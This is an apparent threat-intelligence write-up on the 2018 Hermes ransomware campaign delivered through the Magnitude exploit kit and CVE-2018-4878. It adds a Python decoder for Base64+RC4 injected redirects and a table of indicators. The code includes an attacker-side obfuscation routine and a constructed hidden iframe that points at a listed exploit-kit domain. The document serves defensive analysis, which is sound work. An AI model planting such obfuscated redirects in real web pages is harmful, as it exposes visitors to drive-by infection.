Hermes ransomware distributed to South Koreans via recent Flash zero-day

2018-03-14 Malwarebytes

https://blog.malwarebytes.com/threat-analysis/2018/03/hermes-ransomware-distributed-to-south-koreans-via-recent-flash-zero-day/


Malwarebytes observed Hermes ransomware being delivered to South Korean users through a compromised Korean website that redirected visitors to the Magnitude exploit kit, which in turn exploited the Flash zero-day CVE-2018-4878. The redirection code was hidden in the page source as a Base64-encoded, RC4-encrypted blob that was decoded at page load, and the exploit kit dropped Hermes 2.1 as its payload.

On execution Hermes copied itself to temporary locations, persisted through a batch script in the Startup folder, created the mutex "tech", and exited on systems whose language settings were Russian, Belarusian, or Ukrainian. It then encrypted files on local drives and on reachable network shares. The ransomware generated per-victim RSA key material, appended a HERMES marker and an encrypted session-key blob to each encrypted file, dropped the ransom material under C:\Users\Public, and deleted shadow copies and backup files to hinder recovery.

The targeting of South Korean users and prior reporting around Hermes make the campaign relevant to DPRK-focused tracking, but the excerpt does not provide enough evidence to assert attribution beyond the source's cautious references.
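The injected redirect described above is the piece a web administrator or responder most often has to unwrap by hand. The following is an added example, not code from the Malwarebytes post: it decodes a Base64-then-RC4 obfuscated snippet of the kind described, pulls any URLs out of the recovered text, and checks them against the domains listed in the IOC table below. The injected page, the RC4 key (`ASSUMED_KEY`) and the snippet itself are constructed for the example; in a real injection the key is whatever the loader script on the compromised page passes to its RC4 routine.

```python
"""Decode a Base64 + RC4 obfuscated redirect and match recovered URLs
against campaign domains.  Added example; the page, key and injected
snippet below are constructed, not taken from the analysed site."""
import base64
import re
from urllib.parse import urlparse


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA).  The cipher is symmetric, so one function
    both encrypts and decrypts."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    i = j = 0
    out = bytearray()
    for b in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(b ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def obfuscate(plaintext: str, key: bytes) -> str:
    """Attacker-side wrapping (RC4, then Base64); used here only to build
    the constructed sample page."""
    return base64.b64encode(rc4(key, plaintext.encode("utf-8"))).decode("ascii")


def deobfuscate(blob: str, key: bytes) -> str:
    """Responder-side unwrapping: Base64-decode, then RC4 with the key."""
    return rc4(key, base64.b64decode(blob)).decode("utf-8", errors="replace")


# Domains copied from the IOC table on this page (truncated entries omitted).
CAMPAIGN_DOMAINS = {
    "name.secondadvertisements.com",
    "bannerssale.com",
    "hunting.bannerexposure.info",
    "accompanied.bannerexposure.info",
    "staradvertsment.com",
    "aquaadvertisement.com",
    "marketing.roadadvertisements.com",
}

URL_RE = re.compile(r"https?://[^\s'\"<>]+", re.IGNORECASE)
# Base64 runs of 40+ characters: long enough to skip ordinary identifiers.
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def is_campaign_url(url: str) -> bool:
    """True if the URL's host is a listed domain or a subdomain of one."""
    host = (urlparse(url).hostname or "").lower()
    return any(host == d or host.endswith("." + d) for d in CAMPAIGN_DOMAINS)


def analyze_page(html: str, key: bytes) -> list:
    """Find Base64 blobs in page source, unwrap each with the key and
    report any URLs that resolve to campaign infrastructure."""
    findings = []
    for m in B64_RE.finditer(html):
        try:
            decoded = deobfuscate(m.group(0), key)
        except ValueError:  # not valid Base64 after all (binascii.Error)
            continue
        urls = URL_RE.findall(decoded)
        findings.append({
            "blob": m.group(0)[:24] + "...",
            "decoded": decoded,
            "urls": urls,
            "flagged": [u for u in urls if is_campaign_url(u)],
        })
    return findings


# --- constructed sample (hypothetical key, hypothetical injected iframe) ---
ASSUMED_KEY = b"mgnt"
INJECTED = ('<iframe src="http://hunting.bannerexposure.info/index.php?id=1" '
            'width="1" height="1"></iframe>')
SAMPLE_PAGE = (
    "<html><body><h1>Site</h1>\n"
    "<script>var k='mgnt';var p='" + obfuscate(INJECTED, ASSUMED_KEY) + "';"
    "document.write(rc4(atob(p),k));</script>\n"
    "</body></html>"
)

if __name__ == "__main__":
    for f in analyze_page(SAMPLE_PAGE, ASSUMED_KEY):
        print(f["blob"], "->", f["decoded"])
        print("  campaign URLs:", f["flagged"])
```

When the key is wrong the RC4 output is noise and `URL_RE` finds nothing, so an empty `urls` list for every blob is the signal to go back to the loader script and recover the real key rather than to conclude the page is clean.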

Indicators of Compromise

Type    Value                                First Seen   Last Seen
HASH    a5a0964b1308fdb0aeb8bd5b2a0f306…     2018-03-14   2018-03-14
HASH    237eee069c1df7b69cee2cc63dee24e6     2018-03-14   2018-03-14
EMAIL   [email protected]                    2018-03-14   2018-03-14
EMAIL   [email protected]                    2018-03-14   2018-03-14
DOMAIN  name.secondadvertisements.com        2018-03-14   2018-03-14
DOMAIN  bannerssale.com                      2018-03-14   2018-03-14
DOMAIN  hunting.bannerexposure.info          2018-03-14   2018-03-14
DOMAIN  switzerland.innovativebanner.in…     2018-03-14   2018-03-14
DOMAIN  accompanied.bannerexposure.info      2018-03-14   2018-03-14
DOMAIN  technologies.roadadvertisements…     2018-03-14   2018-03-14
DOMAIN  keemail.me                           2018-03-14   2018-03-14
DOMAIN  staradvertsment.com                  2018-03-14   2018-03-14
DOMAIN  aquaadvertisement.com                2018-03-14   2018-03-14
DOMAIN  marketing.roadadvertisements.com     2018-03-14   2018-03-14
DOMAIN  assessed.secondadvertisements.c…     2018-03-14   2018-03-14
IPv4    207.148.104.5                        2018-03-14   2018-03-14
IPv4    159.65.131.94                        2018-03-14   2018-03-14
IPv4    28.0.0.137                           2018-02-02   2018-03-14

Notes on the table: the two e-mail values and the entries ending in "…" are truncated or redacted in the extracted source and are left as they appear. keemail.me is a public webmail provider's domain (Tutanota) and is listed because the ransom contact addresses use it; treat it as context for the e-mail indicators rather than a domain to block outright. The "IPv4" value 28.0.0.137 matches the Flash Player version string 28.0.0.137, the last build vulnerable to CVE-2018-4878, and is almost certainly a parsing artifact rather than a network indicator; do not add it to blocklists.
